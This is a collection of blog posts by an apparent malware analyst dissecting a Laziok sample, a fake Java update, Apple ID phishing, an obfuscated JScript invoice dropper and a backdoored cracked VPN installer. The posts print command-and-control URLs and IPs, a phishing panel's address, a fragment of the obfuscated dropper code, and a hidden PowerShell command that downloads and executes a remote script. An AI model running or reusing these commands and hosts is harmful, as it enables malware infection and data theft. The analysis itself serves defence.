vineri, 12 ianuarie 2018

Win32/Laziok malware – Cybersecurity research

This topic it is about Win32 / Laziok malware.
It does not matter where I found it.
His hidden activity is very intense. Seeks to install itself, wants to cancel the antivirus, modify the Registry, scans for instaled softwares…etc.

The .exe file has the smss name and with the same name I found it in other AV report. Seems that was detected and named as Win32/Laziok on 01.2015 for the first time, but noone has made a clear report about it.

After running the backdoored software… the smss.exe starts running in backgound creating a good environment.
Scans the whole system to find the computer protection software.
The smss infected file it is hidden on \Application Data\System\Oracle directory, but super hidden.
Easy to ignore becouse the original smss.exe is a windows process.
Tries to connect to a server where it is located the swoleoil.co domain.
  • URL: hxxp:///http://87.121.52.228/panel/includes/verif.php
    TYPE: GET
    USER AGENT: None
  • Organization Neterra Ltd.
  • Country Bulgaria
  • Detection ratio: 43 / 67 at this moment.
  • MD5 0947e4f35f823b37fd8352e643d6cf8c
  • SHA1 79b183a761470c3e3662ab64004072c70131a815

  • hxxp://87.121.52.228/panel/includes/country.php
  • hxxp://87.121.52.228/panel/includes/idcontact.php
  • hxxp://87.121.52.228/panel/includes/post.php
  • hxxp://87.121.52.228/panel/includes/verif.php
  • hxxp://87.121.52.228/panel/includes/chromix.exe
Domain:swoleoil.co
Registrar:Key-Systems GmbH
Registration Date:2014-05-08
Expiration Date:2018-05-07
Updated Date:2017-06-22
Status:ok
Name Servers: carter.ns.cloudflare.com/gwen.ns.cloudflare.com
The server seems to be empty at this time.
That’s all about this malware.
Source:Prodefence.org
Have fun & Stay safe!

vineri, 29 decembrie 2017

Malware analysis and investigation services

Alexandru Anghelus – Malware analyst & investigator


Security of your personal data is very important.
Also sensitive Company data is extremely important.
If you’ve got a file and it looks suspicious, do not open it.
The .zip, .exe, .rtf, .doc, .htm, .rar … etc files can be infected and personal data may become public or can be used against you.
With my analysis services you can remove that insecurity!
Analyzing a file can take a few minutes or even hours.
Investigating the ones found and drawing up the report may take longer, depending on the infected file.
Tracking the hacker may be impossible or may take several days.
Chances of success in discovering the infected file are 99%.
Full report services can help identify the reason, the target and whether it is a direct or random attack.
At the following address you can find some of my work in the field.

I am malware analyst and investigator.
With my skills everyone can have a clear vision about some suspicios files or emails that they have on pc.
I am the founder of Professional Defence Community, a 7 years cybersecurity website.
Web Pentesting.
Malware analysis.
Malware investigator.


Freelancer services websites:
https://www.fiverr.com/alexmalware
https://www.upwork.com/freelancers/~01ec95393b79dc2f6b
https://www.freelancer.com/u/alexpdc

Social media:
https://www.facebook.com/alexarchitect
https://www.linkedin.com/in/anghelus-alexandru/
h**ps://twitter.com/AlexProdefence

Contact:
email: info@prodefence[.]org

marți, 26 decembrie 2017

11+ infected files from one .exe- Malware research

http://www.prodefence.org/11-infected-files-binded-in-one-malware-research/

“I do not think the file is infected …”
All of these are a part of the extracted files from a downloaded file.
All .exe files are VT detected … GET from url functions … POST on url functions … silent uploads / downloads … silent installs … and more …
There was so much activity that the CPU hit 100%.
I do not think it makes sense to analyze anything else here… it takes to long!


Have fun & Stay safe!
Prodefence.org

Monero & Stealer binded in the same file.

http://www.prodefence.org/monero-stealer-binded-in-the-same-file/

Looks like someone really wants a lot from the victims.
Files with more than one malware.
As usual found on an illegal forum.


Unfinished Paypal phishing page?

http://www.prodefence.org/unfinished-paypal-phishing-page/

I’m starting to stop trusting hackers …
How to start sharing it… if is not done yet ….. or are you just modifying something?
To come later?
Have fun & Stay safe!!!

marți, 12 decembrie 2017

Apple ID and Credit Card Phishing – Cybersecurity research


Hello.
Today we will be investigating a phishing case.
Usually the attack of this type comes by email.
An email in which there is a text, a problem or a win and a link.
The text is made to make you go to the prepared website.
The link is usually hidden so you can not figure out where you are going and the hoax is easier.

Let’s start with the email I received so you can understand how you can protect yourself.
  1. Re: to what? Is this a response to an email that I sent to Apple? NO! … It’s a trick used to make you open the email believing it’s a response to an email sent by you.
  2. Apple support…. He caught your attention.
  3. Yandex?!? Yandex Browser is a freeware web browser. But it is still important. The Apple CEO sent you an email after he hired Yandex … that’s why he’s CEO .. to send email to users…
A link is hidden behind the button.
t.co is a Twitter shortener URL and behind this link is the true address we reach.

h**ps://t.co/BeOT0WkjXn =>
h**ps://twitter.com/safety/unsafe_link_warning?unsafe_link=https%3A%2F%2Fwia.email%2F =>
h**ps://apple.com.confirmation.account.centre.rin5de.center/
The good part is that when you are redirected …Twitter and Firefox warn you about the link you want to reach.
Let’s ignore everything this time …
What you see is a clone of the Apple website.
I’m not on some  cyber unit… yet….
Data entered on the fake page will be stored in the server.
So the hacker will know I’ve been around here.
Even if you log in with real data you will receive the same message to move on.
It will ask you to enter bank details to unlock your account and a identification document.

After all, it redirects you to the real Apple website and you’ll sign in to your unlocked account.
At this point you will be glad you did not lose your account, but in reality you gave to the hacker all your banking data + identification documents.

Still let’s see what’s in the main domain.
h**ps://rin5de.center
Index of/ … apple.com.confirmation.account.centre  here it’s the clone page created( old and still online 24.02.2017).
A cpanel and a hint for recover the password.
153.92.209.145:2083
Username: admin
Password: ?
Email: m—d@m—v.com
Name Servers:
ns7.wixdns.net
ns6.wixdns.net

And today…after 10 months online…

The Cpanel(153.92.209.145:2083)
I think the data I’ve entered was also convincing (Insider, cyberunit)
Have fun & Stay safe!!!

duminică, 10 decembrie 2017

Fake Java Update – Malware analysis


File hosted on: h**p://www.packagegiftnow.com/
As you already know, some websites have implemented a script that tells you that you have an old version of Java and gives you the ability to update.
Of course this is a fake update and what you will install on your computer will be a modified file.
This can be a virus, trojan, adware, etc. The idea is that 100% will change something in your computer and you will become the victim. What it means to be a victim can be found in the previous articles.

Total Virus says there would be some detections.
Virus Total Report
I will open this “update” to analyze it.
It has a nice message that tells you something is not going on, but in the background things have already started to work…
Executable connects to:
ec2-54-77-123-135.eu-west-1.compute.amazonaws.com
..and after a few searches, I discovered that several domains were hosted at this address:
info.dinenowe.com
info.dlapplicationscontent.com
info.funworldsoftware.com
info.quickcleardl.com
info.townstocksign.com
info.universebestworld.com
All with reports for spam, malware, ddos, etc
Access your computer in many folders, even if it does not work …
Unfortunately, I do not have time for a more complex analysis today, but the basic idea is that this Java Update is not beneficial.
So be careful what you download and from who!

Prodefence.org

Have fun & Stay safe!

miercuri, 6 decembrie 2017

Unseen stample of malware-Modified coding code – DarkWeb TOR project.

Hello.
Today I had a nice surprise. I found in the Spam file an email telling me they just sent me an electronic invoice.
I have to say that the surprisses are more and more.

You will see!!!

Part 1 – The infected file & dropped files

Dear Madam / Madam,
We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act.
If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!
I have a file attached named öá¬ÔŃÓá No 0258923817 (3)… yeeep and is a JScript file.
Scanned with Virus Total.

The -1 vote is mine! (lol).
So 0 of 60 antivirus engines detects this virus.In the previous article I wrote about the problem of detection.
Security Advice – The Antivirus is just a security helper!
Running the öá¬ÔŃÓá No 0258923817 (3) script –> injects code on vbscript and tries to connect to:
All the connection running this script:
  • withadvertisingthe.com
  • myip.opendns.com
  • noreply.org
  • riseup.ne
  • Faravahar Tor Authority Directory – 199.254.238.52
  • Tor Exit Router – 178.16.208.59
  • vps.net
  • 91.219.237.154
  • digitalocean.com
  • voxility.net
All are Tor servers and VPN servers.
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files(see on github more informations). Remember this.. i will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
What else to show you from this file…
Last write session:
Mades alot of changes after running:
  • Remote AccessTries to identify its external IP address
  • Stealer/PhishingScans for artifacts that may help identify the target
  • Touched instant messenger related registry keysPersistenceInjects into explorer
  • Injects into remote processes
  • Modifies auto-execute functionality by setting/creating a value in the registry
  • Spawns a lot of processes
  • Writes data to a remote process
Dropped files:
  • adprtext.dll
  • agreebowl.dll
Let’s see the agreebowl.dll

Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.

The 0/60 file detection is due to the programming mode. The programmer used an ingenious way to write the code to have a signature different from that of the viruses.
Here i will show you a part of thecompiled code:
ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical(‘p-_sI1owb)jB:o6’)](visitorBehindSpeak(‘9
K0c0htw(o.kvr’));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce(’26P:Y&kwgPLW0′)];
function partRelatedBatBaby(metFreeSomeone){

Part 3 – BitBlinder project

BitBlinder project – A way to create your own hidden services on DarkWeb.
Project-specific files:
  • http://154.35.175.225/tor/status-vote/current/consensus.js
  • http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd
Well… that was a long story and the end it’s here!
0/60 … remember that!!!

Have fun & Stay safe!!!

vineri, 1 decembrie 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.



It is noticed that it is the latest file created.
Also, the installation method requires using this file.

OK.Let’s scan this time!
Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.


OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.
Let’s get started
It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!


When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
The virus runs through the application Powershell.exe, being connected to external sources.
h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
Also connectiong to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php

After investigation I found out that it’s about a payload project.

Currently Empire Power Shell has the following categories for modules:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!